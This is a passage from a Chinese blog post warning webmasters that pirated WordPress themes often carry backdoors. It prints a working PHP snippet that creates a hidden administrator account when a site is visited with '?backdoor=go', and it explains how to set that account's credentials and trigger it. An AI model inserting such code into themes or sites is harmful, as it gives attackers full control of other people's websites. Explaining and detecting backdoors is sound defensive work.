作为一个小站长,对于网站的后门代码肯定是深恶痛绝的,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美破解、无后门等标签来吸引小博主购买,实际上里面不知道加了多少料,最常见的代码如下:
add_action('wp_head', 'creatbackdoor');
function creatbackdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('username', 'password');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
Copy
将 username
和 password
分别为创建的管理员用户名和密码,所创建的后门地址为:www.yourwebsite.com/?backdoor=go
,然后就可以为所欲为了!
当然,后门代码还有很多种,有一些还会经过特殊加密,比如有时候会出现类似